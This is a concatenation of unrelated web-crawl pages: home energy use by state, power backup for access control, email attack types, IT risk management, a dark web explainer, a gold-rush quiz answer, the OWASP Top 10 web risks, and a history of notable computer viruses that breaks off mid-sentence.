percent of homes in Hawaii were heated, and just 57 percent used air conditioning. Conversely, Alaska was the coldest state, using an average of 125.1 MMBtu per household in 2020. In Alaska, 99 percent of homes used space-heating equipment, while only seven percent of homes used air conditioning. “Although site energy consumption is determined by many factors, including varying household behaviors, building construction, and the efficiencies of heating and cooling equipment, space heating and cooling as used in the United States leads to a correlation between average site energy consumption and average temperature,” said the EIA. In 2020, the average energy expenditures, or the amount of money a household spent on site energy, was affected by several factors beyond temperature, such as the type of energy used. For example, households in North Dakota (the second-coldest state) used an average of 94.3 MMBtu in 2020, nearly twice as much as homes in Florida (the second-warmest state), at 50.3 MMBtu. However, the average energy expenditures were about the same for homes in both states—$1,648 in North Dakota and $1,654 in Florida—in part because more than three-quarters of households in Florida reported that they only use electricity in their homes, and U.S. average residential electricity prices are more than three times higher than residential natural gas prices.
<urn:uuid:bdb92b86-db01-4a1a-b9f3-e9ec353417b5>
CC-MAIN-2024-38
https://finleyusa.com/household-electric-consumption-varies-by-region/
2024-09-17T23:05:17Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.53/warc/CC-MAIN-20240917204739-20240917234739-00524.warc.gz
en
0.96174
661
3.328125
3
Access control is one of those essential functions that ought to be working at all times. However, like most electronics, it needs the power to operate. There is, of course, the alternative of just using a traditional lock and key, but that’s no fun (and physical keys are easily lost and manipulated, and are a hassle to replace!) In this article, we’ll explore the role that power plays in access control, and how to address a power outage with respect to your security access system. Why does power matter for access control? In this first section, we’ll explore why power is needed for access control, and address the two main components that require it: door locks, and the actual access control readers. Electric Locks Need Electricity For any modern door that uses an access control system, the lock will be powered by electricity — this is what we call an electric lock. Electric locks fall into two categories: Fail-safe and fail-secure. For a deeper dive into electric lock types, you can check out this in-depth Kisi guide, and for an explanation of the difference between a fail-safe lock and fail-secure magnetic lock you check out this one. Fail Safe Locks Fail-safe locks operate on the principle that as long as power is supplied, the lock is active, and when an unlock is triggered, the power cuts out, and the lock opens. These are generally used for emergency exits, or in situations where if the power is cut out, an exit is still possible. However, this doesn’t mean the power should always be out If the power is out, anyone can get into your space, whether they have access or not. (Example of a fail-safe magnetic lock) Fail-secure locks work the other way around: as long as they are not powered, they are active, and when unlocked, the power is turned on, and you can open the door. The need for power is more obvious here: without electricity flowing to the locks, you can’t actually open them. (Example of a fail-secure bolt lock) Communicating With the Servers It’s not only the locks that need power. Your access control readers and controllers themselves need power to function. (Wiring diagram of access control infrastructure) The readers need power to communicate access information to the wireless locks and to the controller, and the controller itself needs power to be able to transmit unlock information back and forth from the servers. With most modern access control data going to a decentralized cloud infrastructure (like Kisi), the data is hosted on the provider’s servers, and despite all the advantages that offers, it means that the controller needs to be in constant contact with the server. While offline functionality (in the case of an internet outage) is possible, without electricity to power it, the controller will not be able to transmit this information, and the readers will not be able to authenticate access control information. What could cause a power outage? It’s important to try to identify the cause of a power outage. Power supply to your building or office most likely involves a complex infrastructure of electrical components. One weak connection or a myriad of unforeseen events can shut down the entire system. Figuring out what caused the outage can help you address it, and ensure that it doesn’t happen again. The first possible cause is a natural disaster. This can be anything from a broken pipe, to termite damage, to an intrepid squirrel burrowing in your walls and chewing through your wires. These are generally not foreseeable, and in these situations, there’s not much you can do other than calling a repairman and hope that you were well prepared. We’ll give tips for this second part in the last section of this article. Building Power Went Out If your power goes out, and you’re in a larger office building, it’s probably a safe bet that the power to the entire building is out. In these situations, you should know beforehand if your building has any systems or protocols in place for addressing a building-wide power outage. It’s likely that it has some sort of backup power supply or other system to make sure that office operations can continue as per usual. However, if building-wide outages happen regularly, it might be worth re-negotiating your rental contract, or looking into new office space! A common cause for power outages is overconsumption (i.e. wiring too many devices to the same supply, causing the breaker to short-circuit, leaving you high and dry). Thankfully, this is the easiest to address. You will need to replace the breaker in the system, and then make sure that you’re distributing power drains more evenly across sources to prevent this from happening again. How to Ensure that You Have Backup Power Now we arrive at the practical advice section: making sure that your office has an adequate backup power system so that you can be prepared in case the power goes out. Is backup power legally needed? While it’s often necessary to have a backup power supply, it’s important to know what the legal requirements for that power supply are, if there are any. Here are some helpful articles for you to determine if you need backup power. In summary, the idea is that you need backup power for essential functions like ventilation and lighting, but as long as there is a clear means of exiting, you don’t legally need to have backup power for access control. Fire marshals will check for this last point in their inspections. It seems rather obvious that you’d need a way of exiting the building, even when there is no power. This is often provided by emergency push bars to open doors, but can also be provided by electric locks, as long as you have reliable backup power in case of an outage. Backup Power Methods We’ll now go through what you can do to ensure that your office is adequately prepared with backup power in the case of outages. Building Backup Power First, check that the building has a backup generator. This is a baseline requirement, but in some situations, this may be enough to guarantee that your office is covered. Confirm what the allocation of power is and that your office, with all its uses, can be sufficiently supplied. If the building’s backup is sufficient, you’re good! If not, you’ll want a backup battery or smaller generator for your office, or for each lock. As a general rule of thumb, a backup battery should be able to supply power for 24 hours, so you’ll need to know the power consumption of each lock or reader, adjust that for time to get the consumption over a 24-hour day. This will require a bit of math, but it’s totally doable, and then you will be prepared should the worst happen. Dedicated Office Backup In the IT world, most backup power is provided by UPS — an uninterruptible power supply. Here is a guide to the better options out there. If your business is reliant on connectivity, then you simply can’t afford to lose power because that means lost internet and, by extension, lost productivity. That means that IP systems like Kisi can and should be connected through the UPS always. If you’d like to read more about this, and learn about a particular case study, check out this article on the Kisi page. (Example of a popular UPS by the company APC) Power supplies for access control systems can have different appearances: - Simple low voltage power adapter - Power panel for low voltage access control Depending on the size of your access control setup, you might have a larger or more minimal power supply setup. Interesting to check is though what happens when power is out. Normally the building should have a backup power generator, but make sure to double-check. Power supply for access control Altronix is by far the most popular power supply manufacturer. Depending on how much security equipment you want to power with it, you'd need a different strength of power supply. Here is a great example of a 24V low voltage power supply by Altronix which is also UL listed for access control. Kisi's opinion: Make sure to check if the power supply is CE rated and stay away from no-name power supplies! Power supply panel for low voltage access control Power supplies are an often overlooked part of the access control system. They need to be rated for enough voltage to supply power to the access panel and the locks. Kisi's opinion: Typically more professional power supplies can power more locks and have separate power relays to provide surge protection. Often commercial power supplies come with a function input that allows to better wire the product. Here is a wiring diagram of how a magnetic lock is wired to a power supply and the Kisi controller. Losing power in your office is a pretty big deal. With our reliance on electric and digital appliances these days, so many basic functions that we take for granted can be affected, not the least of which is modern access control. Your locks and readers need the power to function. Thankfully, many options exist for ensuring backup power, and you’ll want to make sure that you’re covered in case of an outage. Modernize your access control with remote management and useful integrations.
<urn:uuid:33e8dadd-5fc3-44f3-9421-bdad0e3d69a9>
CC-MAIN-2024-38
https://www.getkisi.com/academy/lessons/how-does-power-loss-in-a-building-affect-access-control
2024-09-20T10:31:10Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652246.93/warc/CC-MAIN-20240920090502-20240920120502-00324.warc.gz
en
0.946642
1,962
2.8125
3
Email Security refers to the security measures that an organization takes in order to secure various aspects of its email system such as identity, content, media attachments or email access. Email, in a way, can also be described as a central repository or a central point of attack for the hackers. Email security can be a target of a phishing attack, identity theft, spam emails and virus attacks. Email is frequently an intruder’s gateway into an organization. And with over 215.3 billion business and consumer emails being received daily, it represents a dangerous opportunity for unscrupulous entities. Data breaches are a large concern for businesses today as the number of attacks keep growing year over year. The purpose of an attack on email is to either use it as a pathway to a larger data breach or as a targeted data breach of the email account. Types of Email Attack There are different types of attack vectors used by hackers to target email systems. It’s important to note that while different attack vectors may employ different methods, they ultimately have a specific purpose when executing the attack. The most common techniques used to attack emails include identity theft, phishing, virus and spam emails. Let us take a closer look into the common techniques that threaten email security. Many organizations these days are either using Microsoft Office 365, G Suite, Zoho or similar services to manage their email systems. Other than hosting emails, services like these offer a suite of useful business tools to manage information in one place. Some apps in the suite include added cloud storage space, project management and collaboration tools, Office suite and much more. Since they are all part of the same suite as the email service, end users do not need a separate set of login credentials to access them. Regardless of whether a company uses the above-mentioned services or their own proprietary service, they all tend to face the same consequences when a hacker manages to get hold of a user’s identity (i.e. login credentials). Employees usually use the suite to store confidential data which will, in a short period of time, be exposed if an attacker gains a handle on the employee’s email account. Email identity theft can have much bigger consequences than it did a few years ago. Phishing is one of the fastest growing attack vectors. For hackers, it is a tried and tested method that has been successfully working for more than a decade. In fact, it has been more than two decades since the first reported phishing attack in 1995. As the internet grew, so did the number of users having a minimum of two email accounts. Hackers now have far wider reach than ever before. According to a recent report by Tripwire, there were 9,576 phishing incidents recorded in 2015, with 916 of them reporting a breach of data. Phishing as a tactic employs several different techniques. Each type of attack has its own target audience and purpose. In an attack called Pharming, the hacker changes IP address associated with the website. This redirects the user to the malicious website despite entering a correct domain name in the URL. Deceptive phishing scams the user by posing as a legitimate website and scares them into paying money. Spear phishing uses the same technique as deceptive phishing, except that this attack makes the user hand over their personal data. According to a report by Symantec, spear-phishing campaigns targeting employees increased 55% in 2015. You can read their complete report. Attacking with a virus through email is another form using email as a vector. Creating a virus and implementing it requires a meticulous amount of planning, an activity more likely to be conceived and executed by a group rather than an individual. A targeted virus can have one specific or multiple purposes. Regardless of that, email itself is rarely a target, merely the first stage of the attack. If the attack is successful, the virus could quickly spread across the network in a short time and can even have the ability to shut down the complete network. Even the simplest virus will attempt to lure the end user into downloading an attachment. Masquerading as documents, they are in fact files which if executed could either take control over the host or even lead to the consequence mentioned above. In a 2015 report , Kaspersky Lab’s web antivirus detected 121,262,075 unique malicious objects: scripts, exploits, executable files, etc. Spam is the most commonly known form of email attack. Perhaps the reason is because we all have a “spam” folder within our email accounts where we receive unwanted emails or emails we didn’t subscribe to. This is likely why even people from non-IT backgrounds know what a spam email is, although they are usually thought of as merely harmless emails which they can directly delete without even bothering to open it. It is true to some extent that some of those emails really are harmless from the end user’s perspective. Spam emails saw a rise in the last couple of years because of the growth of social media and e-commerce websites. Companies, for example, usually broadcast their “latest news” or announcements over email to large numbers of people who are a part of an opt-in list. However, with the right kind of planned attack, spamming could prove to be fatal for companies if not the users. If a hacker is somehow able to gain control of an organization’s email, they can send unsolicited emails to even larger numbers of people. Worse, since the emails are going out from legitimate email addresses, hackers could take advantage of the situation and send emails with a phishing attack or by attaching a virus within an email, hence infecting large amount of users simultaneously. On the other end, a company could also face some serious consequences such as being questioned by the governing authorities for the spam emails. They risk having their internet connection shut down by their internet service providers, which can bring the company’s operations to a complete halt. It is always prudent to be careful when using the emails these days, especially in the professional environment. Email is still a very secure means of communication provided you keep an alert eye out for emails asking you to perform activities such as clicking, downloading, updating, etc. When in doubt, it’s always safer to ask for a second opinion. Checkout our core pages for Managed IT Services : - Chicago Managed IT Services - Jacksonville Managed IT Services - Seattle Managed IT Services - FortWorth Managed IT Services Happily providing insights and thought leadership for businesses to understand technology and cybersecurity! We help you leverage the best IT and technology services providers who you can trust.
<urn:uuid:72291186-7ff3-4cd2-8bf4-25650f74b4b1>
CC-MAIN-2024-38
https://www.cloudsecuretech.com/types-of-email-attacks-and-the-damage-they-can-cause/
2024-09-09T12:13:45Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651098.19/warc/CC-MAIN-20240909103148-20240909133148-00424.warc.gz
en
0.95885
1,373
3
3
IT risk management allows organizations to prepare for some of the most costly risks they’ll face — every threat presented by devices, applications, and the internet. Successful risk management requires risk and IT teams to frequently work together and is most beneficial when organizations use software to organize their entire approach to risk. Table of Contents What is IT risk management? Information technology risk management is a specific branch of risk mitigation, prioritization, and optimization that focuses on the probabilities and threats that come from enterprise hardware, software, and networks. Focus areas of risk management include: - Mitigation — enterprises work to lessen the negative impact of problems that have already occurred - Prioritization — enterprises decide which risks are most important for them to handle and which are less critical - Optimization — enterprises discover which risks are worth taking so they can reap the benefits if the risks pay off Typically, enterprises create a risk management plan (often known as a GRC framework or a business continuity plan) that involves multiple company stakeholders. Enterprises often use a software platform to digitally track risks; the application alerts them when a new threat arises and shows their progress to becoming compliant with any regulatory standards. Also read: How to Meet Regulatory Compliance What are common IT risks? Examples of IT risks include employee mistakes, software vulnerabilities, and network and device failures. Employee mistakes are responsible for around 85 percent of data breaches, according to The Psychology of Human Error study conducted by Stanford University and security firm Tessian. These errors include clicking links in emails that download malware onto a device, failing to use a variety of strong passwords, or accidentally giving away company information through a phone call or text. Eventually, servers grow old, laptops die, and storage disks fail. This becomes a risk when the data on that hardware isn’t backed up and when an organization isn’t prepared to replace the devices. An unexpected server failure can be catastrophic if the server was running high-performance applications with no way to automatically move them to another server. Storage system failure puts sensitive customer information at risk of loss. It also means the organization could become noncompliant with data regulations. Network or web server outages If either the company Wi-Fi network or a data center network go down, the business loses precious operational time, but it could also lose sales deals. If a network outage causes a user-facing application to pause, then customers won’t be able to access it. The same goes for web servers: if they go down, the website goes down, too. This not only affects a business’s sales but also its reputation. Network and data breaches Security breaches aren’t the only IT risks an enterprise faces, but they’re one of the hardest to recover from. Some types of malware embed themselves so deeply into a company’s IT infrastructure that even reinstalling a system won’t automatically rid it of the malicious code. Also read: Data Breach Cost Reaches All-Time High How does IT risk management work? Enterprises typically use IT risk management software to centralize and organize their approach to protecting these sectors of the business. User access to both networks and accounts Access risks include attackers breaching the company network, information compromise and theft, and malicious software attacks. IT risk management solutions alert administrators when an unauthorized user attempts to access a system or when network traffic resembles a common security threat. Data risks include exposing customer data, being noncompliant with data protection regulations, and having an entire storage system breached. An IT risk management platform keeps records of each step to compliance, tracking an organization’s progress and sending alerts to stakeholders that have compliance tasks assigned to them. It also prioritizes threats, like a storage breach, that the business should address. Third-party software and integrations Any software that’s linked to another program has at least limited abilities to control it. This is another vector for attackers to breach a network, especially if the third party application has unpatched vulnerabilities. With the right credentials or backdoor access, attackers could potentially also move from a third party application to the primary application and gain full control of it. IT risk management software offers tools like third-party vendor assessments to gauge how secure the vendor’s platform is. Also read: Best Risk Management Software Why is IT risk management important? Between third-party management and compliance regulations, data protection and networks, IT risk management covers every danger presented by technology to an enterprise. As enterprises undergo digital transformation and shift to remote workforces and applications, they need a centralized plan to manage their IT resources safely. IT risk management provides a framework for businesses to track every threat presented by devices, networks, and human users. The software that enterprises use record risks and rank their importance, detailing how critical a risk is to business operations and alerting the employees who are responsible for handling it. Without managing information technology and security risks, businesses will rapidly become swamped with compliance tasks, security threats, and endpoint device management. Then they’ll be unable to organize their responses to risk. How to implement IT risk management To develop a risk management strategy specific to information technology, consider approaching IT management with team collaboration at the forefront. Be prepared for enterprise IT risks to scale as your enterprise grows, too: the more employees and device users the business receives, the more internal security threats increase. Ensure risk and IT teams work together An important part of risk management is decreasing silos. If your enterprise has a risk team and an IT department, they’ll need to collaborate to set up a successful IT risk management strategy. Working together means these two teams will be increasingly aware of technology threats and prioritize the ensuing risks. For example, if a storage system is breached, IT or infosec teams will discover patterns within the attack and share all relevant information with the risk team. Both teams offer insights that the other needs, according to Joel Friedman, the CTO and co-founder at risk management provider Aclaimant. “Risk managers and IT teams can work in tandem to boost risk management awareness across their business and also ensure all stakeholders can use this technology to its greatest potential,” said Friedman. “While most risk managers are inherently an expert in risk and not technology, they can lean on their IT counterparts to boost adoption of understanding of technology and data that will help them more effectively do their job. On the flip side, IT teams should also consider incorporating risk management into their processes, as any technology presents not only opportunities but also potential risks to the overall business.” Risks and information technology are so closely entwined, it’s nearly impossible—and unwise—to keep them separate. Organizations that recognize the dangers inherent in IT and the consequences they have for enterprises will be better prepared to manage tech and security-related risks. Prepare for insider risk Many IT risks come from the employees within the organization. But enterprises don’t pay enough attention to the role their own workers play in creating risk, according to Jadee Hanson, the CIO and CISO at data protection company Code42. The three Ts — transparency, training, and technology — help enterprises manage those risks. “A significant aspect of IT security risk management that is commonly (and mistakenly) neglected is insider risk,” said Hanson. “First, you want to have a transparent security-centric culture that prioritizes data protection at every level. Leaders should work with the cybersecurity team to produce well-thought-out protections on data use, handling and ownership, which can be delivered to their employees, contractors, vendors, and partners.” Collaboration is critical to developing a risk management strategy; that includes informing employees of all the risks related to them. “Employees need to be properly trained on the business impact of their data exposure actions with security and awareness training from initial on-boarding through off-boarding. Gone are the days of hour-long training with no relevance to the work that employees are doing. To address these data exposure issues, we need point-in-time training that occurs right after data exposure events happen,” Hanson said. Lastly, monitoring and detection tools reveal what regions of the IT infrastructure have been compromised. “Having a technology solution in place that gives security teams visibility to data moving off endpoints to untrusted cloud destinations, personal devices, and personal emails is key,” Hanson explained. “Today, most (71 percent) security teams lack visibility into what and/or how much sensitive data is leaving their organizations. Without technology providing the right visibility, it’s nearly impossible for security to focus on the right protections and mitigate the overall data exposure risk.” Prepare your strategy for organizational scaling A successful IT risk management strategy must be able to grow with the company; otherwise, it will need to be reworked regularly. A better approach than redesigning the strategy each year—especially if your organization is in a period of rapid tech growth or change—is to develop a scalable risk management plan, according to Vasant Balasubramanian, VP and & GM of the risk business unit at ServiceNow. “The need to ‘plan for scale’ is due to the explosion of technology in every phase of the business: the pace of change, range of threats, growth of suppliers, and more,” Balasubramanian said. “To compound the problem, IT teams are not able to add people at the same rate as the need is growing. Therefore, first and foremost when implementing an IT risk management strategy, you should design the program with scalability in mind. “This is a journey that cannot be accomplished overnight, but the planning for scalability must be in place up front to achieve the desired maturity over time. Only then can organizations stop the cycle of recreating IT risk programs every few years.” Examples of planning for scale include: - Setting up an analysis plan for new technology so the IT risk management team can vet every new application or tech advancement for potential risks and rewards - Choosing risk management software your business will still be able to use in a few years, especially if the organization grows substantially - Building a collaborative IT and risk management team that is established regardless of who leaves or joins the company, and preparing to have new employees move into those roles. Successful IT risk management strategies must be focused on collaborative and transparent processes between technology teams and risk managers. They also must take into account the many threats that employee errors pose and prepare for the business to grow rapidly, as this can accelerate both IT and human risks.
<urn:uuid:06a412e2-8cd3-4973-8e8d-1cfa4918ea6a>
CC-MAIN-2024-38
https://www.cioinsight.com/it-management/it-risk-management/
2024-09-12T00:25:11Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651405.61/warc/CC-MAIN-20240911215612-20240912005612-00224.warc.gz
en
0.944766
2,202
2.859375
3
What Is The Dark Web? You recently heard that businesses and individuals suffer tremendous losses when their information gets stolen and later found on the Dark Web. Can this happen to you, and is this a genuine threat you need to investigate further? Is The Dark Web Fact or Fiction? The online world is filled with tall tales, horror stories, fiction, and fantasies. But there is one area, not seen on the surface, lurking in the shadows, known as The Dark Web. Its very name has a sinister sound that instills deep fear and caution and brings great concern for IT service providers. Or is this just another internet prank being played on all of us? Watch Our Latest Video and Decide is This Real or an Elaborate Hoax: What is the Dark Web? The Dark Web resides on the internet that does not get indexed by search engines. It is indeed a location that is part of the internet. It’s visibility to search engines is always hidden, and users are anonymous. To journey into the dark web, don’t expect your regular internet browser to work. You have to use an anonymizing browser known by hackers as TOR, short for The Onion Router, to access. What is a Tor Browser? According to CSO Online contributor Darren Guccione: “The Tor browser routes your web page requests through a series of proxy servers operated by thousands of volunteers around the globe, rendering your IP address unidentifiable and untraceable. Tor works like magic, but the result is an experience that’s like the dark web itself: unpredictable, unreliable and maddeningly slow.” – Source CSOOnline.com What Takes Place on the Dark Web? Primarily the dark web is a host of criminal activity. If you have access and a means to pay, you can buy usernames, passwords, and credit card numbers. You have hacked bank accounts and software that lets you break into other people’s computers. But there are other areas of the dark web where individuals go to play chess and socialize online, such as the BlackBook, it’s the Facebook of Tor. Where On The Internet is the Dark Web? To answer that, you must first understand the internet is the backbone, and the Web is just one way of swapping information and data over the internet. Overall the internet has three sections. - Surface Web – This section is where all web-based content gets found by search engines - Deep Web – This section of the internet search engines will not find - Dark Web – This section is not found in search engines, has anonymous users, using anonymizing software Why Is This Important To Know? Knowing the difference between the three internet web sections gives you a clear idea of planning and building proactive and reactive cybersecurity programs. By understanding the differences, you and your management team can determine the right course of action. You can either remediate an incident or identify information belonging to your organization if indeed it has been compromised and leaked. How To Ensure Your Data Stays Off The Dark Web? There’s only so much you can do by yourself to protect your company’s information. When you contact Compunet InfoTech, we have more direct ways to examine your data. Our Dark Web ID solution can quickly uncover compromised credentials that may show up on the dark web. It is another level of high-end data theft protection, keeping you and your information safe. Contact Compunet InfoTech’s team of experts to assist with all your security needs. Click here or call (604) 986-8170 to get in touch with our representatives.
<urn:uuid:17445fc1-dc09-445e-922c-314af8a231f7>
CC-MAIN-2024-38
https://www.compunet.ca/blog/what-is-the-dark-web/
2024-09-13T04:17:16Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00124.warc.gz
en
0.921085
756
2.59375
3
What event in 1849 attracted prospectors and settlers to the boomtowns of the American west? The gold rush in 1849 in San Francisco. The gold rush in 1849 in San Francisco attracted prospectors and settlers to the boomtowns of the American west. The gold rush in 1849 in San Francisco was a significant event that triggered a massive influx of people to the western part of the United States. The discovery of gold in California sparked a frenzied rush of prospectors and settlers hoping to strike it rich in the newly found gold mines. As news of the gold discovery spread, thousands of people from all over the country and even from other parts of the world flocked to California in search of fortune. The promise of wealth and opportunity lured individuals from diverse backgrounds, creating a melting pot of cultures and ethnicities in the boomtowns that emerged in the American west. The discovery of gold in California not only shaped the landscape of the west but also had a lasting impact on the social and economic development of the region. The gold rush led to the rapid growth of towns and cities, the establishment of mining communities, and the emergence of new industries to support the influx of people seeking their fortunes in the goldfields. Overall, the gold rush in 1849 in San Francisco was a transformative event that forever altered the course of American history, leaving behind a legacy of opportunity, challenge, and resilience that continues to be remembered and celebrated to this day.
<urn:uuid:47a2f930-e631-48e1-a705-d337360bd4e9>
CC-MAIN-2024-38
https://bsimm2.com/history/the-fascinating-history-of-the-gold-rush-in-san-francisco.html
2024-09-15T14:04:04Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651630.14/warc/CC-MAIN-20240915120545-20240915150545-00824.warc.gz
en
0.947237
299
3.84375
4
Ensuring web application security is important for both businesses and developers. The OWASP Top 10 list is a crucial guide that highlights the most common and pressing cybersecurity hazards today. Professionals should get to know these vulnerabilities, get insights from the list, and follow its guides to secure web applications against common threats. What Is the Purpose of the OWASP Top 10? The OWASP Top 10 is an extensive report that identifies major web application security risks for organizations. The Open Web Application Security Project (OWASP) and various security experts worldwide constantly update this compilation to include new cybersecurity risks. As of this writing, the latest version of this report is the OWASP Top 10 2021 issue. OWASP Top 10 primarily aims to educate developers, security professionals, and organizations about common security weaknesses in applications. This way, they can take a proactive step in enhancing their safety within this area. Understanding the OWASP top ten is essential for anyone involved in the development and deployment of web applications. The report serves not only as a guideline for identifying and addressing security risks, but also as a framework for the implementation of modern security measures. By knowing the contents of the OWASP top ten, stakeholders can significantly minimize risks associated with public exposure. What Are the Most Prevalent Types of Attacks Targeting Web Applications? The list is vast, and includes flaws in categories such as broken access controls and broken authentication. These flaws make it possible to attack systems with insufficient protection, allowing unauthorized entry and data breaches. Online attackers also regard security misconfigurations, such as using default or incomplete settings, as an opportunity for them. Apps revealing confidential information are another concern addressed under the OWASP top ten. This allows personal data like names, financial details or login credentials to fall into the hands of criminals. Through proactive measures, the OWASP Top 10 breaks down web application security and emphasizes the need to stay on top of it. The list is a wake-up call for organizations to prioritize application security risk and address these security vulnerabilities with urgency: 1. Injection Attacks: In SQL injection attacks, an attacker attempts to execute malicious SQL statements by inserting them into an input field of an application. This attack targets databases that the application uses to store, retrieve, and manipulate data. Through a SQL injection attack, an attacker can gain access to the database and view, modify, delete, or even create new data. 2. Broken Authentication: Broken authentication attacks refer to security vulnerabilities and exploits where attackers target weaknesses in the authentication and session management processes of a web application or system. Authentication is the process of verifying the identity of a user, device, or entity, typically through credentials like usernames and passwords. Attackers can exploit flaws when authentication mechanisms are improperly implemented or configured to impersonate legitimate users and gain unauthorized access to sensitive areas of the application or user data. 3. Sensitive Data Exposure: Failure to adequately protect sensitive information, such as financial data or personal identifiable information (PII), can lead to data breaches, regulatory penalties, and reputation damage. These vulnerabilities can lead to legal consequences, due to legislation such as the GDPR (General Data Privacy Regulation) in Europe, or the HIPAA (Health Insurance Portability and Accountability Act) in the US, among others around the world. 4. XML External Entities (XXE): XML External Entities (XXE) attacks are a type of security vulnerability targeting applications that parse XML input. This vulnerability occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. External entities in XML can be used to define external resources by URI (Uniform Resource Identifier). If an XML parser is improperly configured to process these entities without proper restrictions, an attacker can exploit this feature to conduct various malicious activities. 5. Broken Access Control: Broken access control refers to security weaknesses and vulnerabilities in a web application or system that allow unauthorized users to access or perform actions on resources that they should not be able to. Improperly implemented or configured access control allows attackers to bypass these restrictions and gain unauthorized access to sensitive data or functionalities. 6. Security Misconfigurations: Security misconfigurations constitute one of the most common yet preventable vulnerabilities within IT systems and applications. Attackers can exploit gaps when security settings are improperly defined, implemented, or maintained. Misconfigurations can stem from a wide range of oversights, such as unnecessary services running on a system, default accounts with unchanged passwords, unnecessary user privileges, or improperly exposed data. 7. Cross-Site Scripting (XSS): These attacks are a type of injection security vulnerability typically found in web applications. XSS enables attackers to inject malicious scripts into content that appears to be from a trusted source. The malicious script is executed when this content is viewed by users, potentially compromising the confidentiality, integrity, or availability of the user’s data or the application’s functionality. 8. Insecure Deserialization: Insecure deserialization attacks occur when an application deserializes data from untrusted sources without sufficient validation. This leads to the execution of malicious code, denial of service (DoS) attacks, or other unintended consequences. Serialization converts an object into a format for easy storage or transmission. Deserialization converts the stored or transmitted data back into an object. 9. Use of Components with Known Vulnerabilities: Attackers can exploit known issues and potentially compromise the system when third-party components on applications are not updated or patched. Examples of this threat are the Log4j vulnerabilities in late 2021, the XZ utils backdoor in 2024 and WAF bypass attacks. 10. Insufficient Logging and Monitoring: Poor logging and monitoring capabilities hinder detection efforts as well as delay incident response, thereby increasing the effects of security breaches. These top ten web application security risks highlight the significance of proactive approaches towards maintaining the integrity of digital assets from evolving threats. What Resources and Tools Does OWASP Offer for Improving Web Application Security? OWASP has provided numerous tools and resources to help organizations fight against web application security threats. These offerings aim to help organizations understand, identify as well as mitigate any possible risks relating to information safety and confidentiality. They include comprehensive guidelines and documentation, alongside open-source tools for developers. These resources will enhance their skills on how they can guard against these types of weaknesses addressed in the OWASP Top 10. The availability of these materials signifies OWASP’s commitment towards enhancing web application security. With assistance from these resources, security testers can perform a thorough evaluation on the system’s defense levels. These resources help anyone who wants their applications to become resilient to hacking attacks. What Are the Best Mitigation Strategies to Fight Cybersecurity Threats? Dealing with the risks disclosed in the OWASP top ten requires a combined effort. Implementing proper access controls to inhibit unauthorized access to the system and ensuring strong authentication mechanisms are critical measures. The other important step for safeguarding web applications is updating and patching software regularly. Furthermore, adopting a “security first” approach helps developers reduce coding errors. Another effective way of mitigating security risks involves using a Web Application Firewall (WAF). A WAF can protect APIs and applications by blocking malicious traffic from reaching it through the internet. By following these steps, organizations can position themselves better against cyberthreats, safeguard personally identifiable information (PII), and maintain user trust. Some other effective mitigation strategies include: - Application of safe coding practices and implementing input validation approaches to prevent injection attacks and XSS vulnerabilities. - Use of strong authentication mechanisms alongside sound session management routines for preventing unauthorized logins or account takeover. - Encrypting sensitive data during transmission or at rest to reduce the likelihood of information leaks. - Regular updates to software components to fix any known vulnerability or misconfiguration issues. - Proactive identification and remediation of possible security weaknesses within software systems, through penetration testing, code reviews and periodic security assessments as well.
<urn:uuid:473ed45d-6501-48e6-9468-3352b0837f82>
CC-MAIN-2024-38
https://www.azion.com/en/learning/websec/what-is-the-owasp-top-10-list-of-web-application-security-threats/
2024-09-15T13:13:02Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651630.14/warc/CC-MAIN-20240915120545-20240915150545-00824.warc.gz
en
0.903153
1,645
2.65625
3
Computer viruses are damaging and costly to businesses. Statistics show that approximately 21% of companies in Canada were affected by cybersecurity incidents in 2017. Businesses also spent about $14 billion in preventing, detecting, and recovering from cybersecurity issues in the same year. As the world becomes more internet-connected, new pieces of malware are discovered every day, with the cost of damage amounting to over $55 billion. While this figure accumulates from the damage caused by multiple malware, three computer viruses stand out as the most notorious. The impact of the ILOVEYOU virus and the vulnerabilities it exposed can still be felt more than 20 years later. Tens of millions of computers were affected worldwide, and the damage that resulted amounted to close to $10 billion. So bad was the damage that the government and large corporations had to take their mailing systems offline for a while to prevent infection. The virus emanated from Hong Kong, and at that time, the internet concept was still relatively new to the world. Statistics show that only about 28% of people in Hong Kong had access to the internet, 27% in the United Kingdom, 15% in France, and 43% in the United States, where technology was invented. Spreading from Hong Kong, the virus brought down communication and destroyed file systems. Affected companies included investment banks, the Dow Jones newswire, and public relations firms. Two Filipino programmers, Onel de Guzman and Reonel Ramones were behind the creation of the virus. Social Engineering at Work In this case, the hackers used a love confession. The email’s subject line was “ILOVEYOU,” and the message was “kindly check the attached LOVELETTER from me.” Recipients, thinking the email was a joke or declaration of love from someone, opened what seemed to be a text file. In reality, it contained an executable program. The virus quickly took control and replicated itself, spreading to many people. Within minutes, office email servers were clogged and destroyed victim’s hard drives, corrupting and deleting thousands of files. At that time, there were no laws about malware, and the culprits were never charged. However, it was around this time that the E-Commerce Law was enacted to deal with the problem. Mydoom is probably the worst computer virus outbreak that ever happened. It took place in 2004, causing damages of approximately $38 billion. The inflation-adjusted cost translated to about $52.2 billion. The virus, also known as Novarg, is technically a worm that spreads through mass emailing. At one point during its attack, it was responsible for 25% of all the emails sent. The damage involved the scraping of email addresses from the infected computers. It then replicated itself by sending copies to all the addresses it could find. Further, the virus roped the affected devices into a web of computers, resulting in what is known as a botnet. This enabled the attackers to propagate distributed denial of service (DDoS) attacks. The attacks would shut down the targeted websites or servers. Mydoom is still a common virus today, working behind 1% of all phishing emails. Given that over 3.4 billion phishing emails are sent daily, it’s undeniable that the virus is a significant force that has a life of its own. The virus still infects poorly-protected machines by sending 1.2 billion copies of itself, 17 years after its creation. The financial costs of the Code Red virus are approximately $2.4 billion. It hit in 2001 and managed to penetrate about 975,000 hosts running Microsoft’s IIS web server. This corporate software program contained a security hole that cybersecurity experts had not addressed yet. The virus endangered global internet performance, warranting an FBI warning. Upon investigation, the virus was traced to a university in China. It had already infected over 300,000 computers 